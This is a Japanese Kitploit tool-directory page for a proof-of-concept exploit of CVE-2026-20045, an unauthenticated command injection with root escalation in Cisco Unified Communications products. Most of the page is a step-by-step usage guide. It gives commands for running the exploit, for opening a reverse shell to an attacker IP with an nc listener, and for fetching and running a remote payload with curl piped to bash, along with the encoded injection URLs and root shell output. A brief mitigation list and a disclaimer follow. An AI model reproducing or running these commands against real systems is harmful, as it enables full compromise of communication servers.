Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Ashwesker-CVE-2026-20045 — CVE-2026-20045の概念実証エクスプロイト。Cisco Unified Communications製品における重大な未認証RCEであり、コマンドインジェクションとルート権限昇格を伴うリバースシェルを可能にします。 | Kitploit
ツール/GitHubGitHub/dkstar11q/ashwesker-cve-2026-20045
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール
GitHubdkstar11q/ashwesker-cve-2026-20045

Ashwesker-CVE-2026-20045

CVE-2026-20045の概念実証エクスプロイト。Cisco Unified Communications製品における重大な未認証RCEであり、コマンドインジェクションとルート権限昇格を伴うリバースシェルを可能にします。

リポジトリを見る
637ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2026-20045 — ゼロデイ詳細解説 🚨

Cisco AsyncOS 0-Day Vulnerability

🧨 概要

複数の Cisco Unified Communications 製品に影響を与える 重大なリモートコード実行(RCE) 脆弱性です。パッチが公開される前に、実際の攻撃で悪用が確認されていました。


🔥 危険性

  • 🚫 認証不要
  • 🖥️ リモートコード実行
  • 👑 ルート権限取得の可能性
  • 🌍 実環境での悪用が確認済み

つまり、攻撃者は影響を受けるシステムをリモートから完全に乗っ取ることが可能です。


🚨 CVE-2026-20045.py の使用例

PoCスクリプトの実行方法について、使用例 を含む洗練されたガイドです。脆弱なCisco Unified Communicationsターゲット(未パッチのWebインターフェースが公開されている場合)でエクスプロイトが成功した際に、ターミナルに表示される内容 を正確に示しています。絵文字、色付きコードブロック(Markdown経由)、構造化されたセクションで読みやすさを向上させています。😎

1. 基本システム情報テスト

ユーザーID、ユーザー名、システム詳細を取得する簡単なコマンドを実行します。

コマンド:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"

成功時の表示(成功出力):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj
[*] Initial command: id && whoami && uname -a
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h
[+] Stage 2 (root escalation) likely succeeded! Status: 200

[+] Possible command output:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root)
root
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
------------------------------------------------------------

🔑 成功の兆候: 緑色の [+] インジケーター、HTTP 200ステータス、出力ブロック内のコマンド結果。出力が表示されなくてもステータスが200なら、静かに成功しています!

2. リバースシェル設定

自分のマシンに対話型シェルを生成します。まず、リスナーを起動します: nc -lvnp 4444。

コマンド:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"

成功時の表示(スクリプトターミナル内):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==
[*] Initial command: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Command executed silently (check target for effects)

リスナー(nc)ターミナルでの表示:

root@kitploit:~
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321
bash: cannot set terminal process group (1234): Inappropriate ioctl for device
bash: no job control in this shell
root@ucm-server:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ucm-server:~#

🚀 成功の兆候: スクリプトが成功メッセージを表示。リスナーが即座にルートシェルのプロンプトを取得。そこでコマンドを入力して操作できます!

3. ファイルのダウンロードと実行(例: カスタムペイロード)

サーバーからスクリプトをダウンロードして実行します。

コマンド:

root@kitploit:~
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"

成功時の表示(成功出力):

root@kitploit:~
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=
[*] Initial command: curl -s http://YOUR_SERVER/payload.sh | bash
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Command executed silently (check target for effects)

📥 成功の兆候: 200ステータスコード。ターゲット(例: ログ/ファイルの確認)または自分のサーバー(ダウンロードログ)で確認。ペイロードが静かな場合、直接の出力はありません。

💡 プロのヒント:

  • ネットワーク権限が必要な場合は sudo で実行。
  • HTTPSターゲットを使用。スクリプトは自己署名証明書を処理します。
  • 失敗した場合(例: 404/403)、他のパスを試すか、ターゲットがパッチ適用済みか確認。
  • 常に倫理的にテストしましょう!😈

🧩 影響を受ける製品

  • ☎️ Cisco Unified Communications Manager(Unified CM)
  • 🧑‍💼 Unified CM Session Management Edition(SME)
  • 💬 IM & Presence Service
  • 📞 Cisco Unity Connection
  • ☁️ Webex Calling Dedicated Instance

🧠 根本原因

HTTP管理インターフェース におけるユーザー入力の検証不備により、コマンドインジェクション が発生し、リモートコード実行につながります。


📊 深刻度

  • CVSSスコア: 8.2(高)
  • ビジネス影響: 重大

🛡️ 緩和策と防御

  • ⚡ Ciscoのパッチを直ちに適用
  • 🔒 管理インターフェースへのアクセスを制限
  • 🌐 システムをインターネットに直接公開しない
  • 👀 不審なHTTPアクティビティをログで監視
  • 🏛️ 該当する場合は政府の脆弱性修復ガイダンスに従う

🔒 免責事項:

すべてのPoCコードは、許可されたシステム上での倫理的・教育的な使用のみを目的としています。無許可の悪用は違法です。誤用に対する責任は負いません。😈

ツールをダウンロード